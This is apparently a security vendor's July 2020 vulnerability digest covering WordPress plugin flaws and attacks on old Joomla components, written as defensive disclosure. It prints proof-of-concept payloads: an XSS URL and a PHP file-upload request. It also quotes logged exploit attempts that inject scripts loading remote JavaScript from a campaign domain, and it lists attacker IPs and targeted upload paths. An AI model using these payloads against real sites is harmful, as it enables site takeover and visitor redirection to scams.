Vulnerabilities Digest: July 2020

Labs Note

Relevant Plugins and Vulnerabilities:

PluginVulnerabilityPatched VersionInstalls
Asset CleanUp: Page SpeedAuthenticated XSS1.4.6.780000
Quiz And Survey MasterAuthenticated Stored XSS7.0.030000
Comments – wpDiscuz 7.0.0 –Arbitrary File Upload7.0.570000
Real Estate 7Reflected XSS3.0.48000
CarePlusReflected XSS5000
WooCommerce SubscriptionsUnauthenticated Stored XSS2.6.310000
CareerfyReflected XSS4.4.02300
JobSearchReflected XSS1.5.61300
TC Custom JavaScriptUnauthenticated Stored XSS1.2.210000
Email Subscribers & NewslettersAuthenticated SQL injection4.5.1100000
WP-Live Chat by 3CXAuthenticated Stored XSS8.2.050000
InJobReflected XSS3.4.11880
Travel BookingUnauthenticated SQL Injection2.8.48000
Travel BookingUnauthenticated XSS2.8.48000
MonalisaReflected XSS2.1.3600
Adning AdvertisingArbitrary File Upload1.5.68000
Security & Malware scanSecurity Nonce Leak2.515000
Testimonials WidgetAuthenticated Stored XSS30000

Highlights for July 2020:

  • Cross site scripting is still the most common vulnerability in WordPress Plugins. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Attackers continue to target old plugins with known vulnerabilities in an ongoing malware campaign targeting WordPress websites.
  • Massive attacks on Joomla old components.

Details for these highlights can be found under the components listed below.

Asset CleanUp: Page Speed Booster

Last week, we reported multiple vulnerabilities in Asset CleanUp: Page Speed Booster caused by an improper handling of user input. This plugin has 80000 active installations. A successful attack can lead to malicious script execution.

Here are the details of one of those vulnerabilities:

Patch (version 1.3.6.7):

--- a/wp-asset-clean-up/trunk/classes/BulkChanges.php
+++ b/wp-asset-clean-up/trunk/classes/BulkChanges.php
 
     /**
-     * GlobalRules constructor.
+     * BulkChanges constructor.
      */
     public function __construct()
     {
-        $this->wpacuFor      = Misc::getVar('request', 'wpacu_for', $this->wpacuFor);
-        $this->wpacuPostType = Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType);
+        $this->wpacuFor      = sanitize_text_field(Misc::getVar('request', 'wpacu_for', $this->wpacuFor));
+        $this->wpacuPostType = sanitize_text_field(Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType));
 
-        if (Misc::getVar('request', 'wpacu_update') == 1) {
-            $this->update();
-        }
+        if (Misc::getVar('request', 'wpacu_update') == 1) {
+            $this->update();
+        }
     }

PoC:

/wp-admin/admin.php?page=wpassetcleanup_bulk_unloads&wpacu_for=%22name%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

Adning Advertising 

The paid plugin Adning Advertising, boasting over 8,800 license sales,  fixed a remote code execution caused by poor file validation.

Vulnerable Code:

$valid_formats = isset($_POST['allowed_file_types']) ? explode(',', $_POST['allowed_file_types']) : array('jpg');
        if( in_array('jpg', $valid_formats) )
        {
            $valid_formats[] = 'jpeg';
        }

PoC:

284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"index.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aphpinfo();\x0a\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0[...Skipped...]623104048873990\x0d\x0aContent-Disposition: form-data; name=\"allowed_file_types\"\x0d\x0a\x0d\x0azip,jpg,png,gif,svg,mp4,php\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0a{\"folder\":\"items/56/\",\"dir\":\"/var/www/html/wordpress/wp-content/uploads/angwp/\",\"src\":\"http://vulnerable.site/wp-content/uploads/angwp/\"}\x0d\x0a-----------------------------284258444925728623104048873990--\x0d\x0a'     $'http://vulnerable.site/wp-admin/admin-ajax.php'

Attackers detect the presence of this plugin by requesting the following js file:

/wp-content/plugins/adning/webpack.config.js

This is a critical vulnerability that, when exploited, allows attackers to take control of an entire site.

Plugin Payloads in Ongoing Malware Campaign

Our team saw a number of new IPs and domains added to an ongoing campaign. This malware is typically found to redirect visitors to various kinds of scam landing pages — including tech support scams, fake lottery wins, and malicious browser notifications.

Malicious Domains & IPs detected in July

This month, two new malicious domains have been associated with this campaign exploiting known WordPress vulnerabilities:

  • https://lobbydesires[.]com/location[.]js
  • https://cls[.]balantfromsun[.]com/cls[.]js

The following IPs have been associated with this campaign:

112.96.166.247
195.54.160.21
91.208.99.2
77.247.181.162
51.83.99.191
52.228.31.213
178.33.227.167
163.172.125.41
80.82.68.202
50.62.134.81
95.211.230.211
46.105.108.212
35.224.226.217
62.210.140.4
[...]

Some Exploit Attempts Seen in the Wild

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%[..skipped.]%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-07-02

80.82.68.202 -- POST -- /wp-admin/admin-ajax.php?action=save_map_name -- --d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22fff\x22; filename=\x220.txt\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A0\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapName\x22\x0D\x0A\x0D\x0A\x22><script src='https://lobbydesires.com/location.js?la=1&v14' type=text/javascript></script>\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4--\x0D\x0A -- 2020-07-04


51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- licenseEmail=%22%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E&licenseNumber=43 -- 2020-07-04

178.33.227.167-- POST -- /wp-admin/admin-ajax.php?action=update_zb_fbc_code -- domain=%3C%2Fscript%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cscript%3E -- 2020-07-06

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front -- 2020-07-06

52.228.31.213 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-06

51.83.99.191 -- PUT -- /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi -- gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%26v11%27%3E%3C%2Fscript%3E -- 2020-07-07


51.83.99.191 -- POST -- /wp-admin/admin-post.php -- action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%[..skipped..]ups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace -- 2020-07-08

195.54.160.21 -- GET -- /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://lobbydesires.com/location.js?la=1&v15'></script> -- - -- 2020-07-08

35.224.226.217 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-20

62.210.140.4 -- GET -- /wp-admin/admin-ajax.php?action=wpdAddSubscription -- - -- 2020-07-29

178.33.227.167 -- GET -- /wp-admin/admin-ajax.php?action=wpuf_file_upload -- - -- 2020-07-29

New malicious campaign aiming old Joomla Components 

This month, we detected a spike in the number of requests targeting old Joomla components. These types of attacks are fairly common, but we’ve seen an increase during this month.  Successful attacks can lead to a full website compromise.

Old Component URLs Targeted

/index.php?option=com_adsmanager&task=upload&tmpl=component
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php
/administrator/components/com_civicrm//packages/OpenFlashChart/tmp-upload-images/vuln.php
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=
/index.php?option=com_myblog&task=ajaxupload
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/administrator/components/com_simplephotogallery/lib/uploadFile.php
/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php
/components/com_jbcatalog/libraries/jsupload/server/php
[...]

Public exploits already exist for all of the components listed above, and many other plugins are also under attack. You can check our previous lab notes for additional information from past reports.

To mitigate risk, we strongly encourage you to keep your website’s software and components up to date to prevent infection or vulnerability exploitation. Websites behind the Sucuri Firewall are virtually patched against these vulnerabilities.

You May Also Like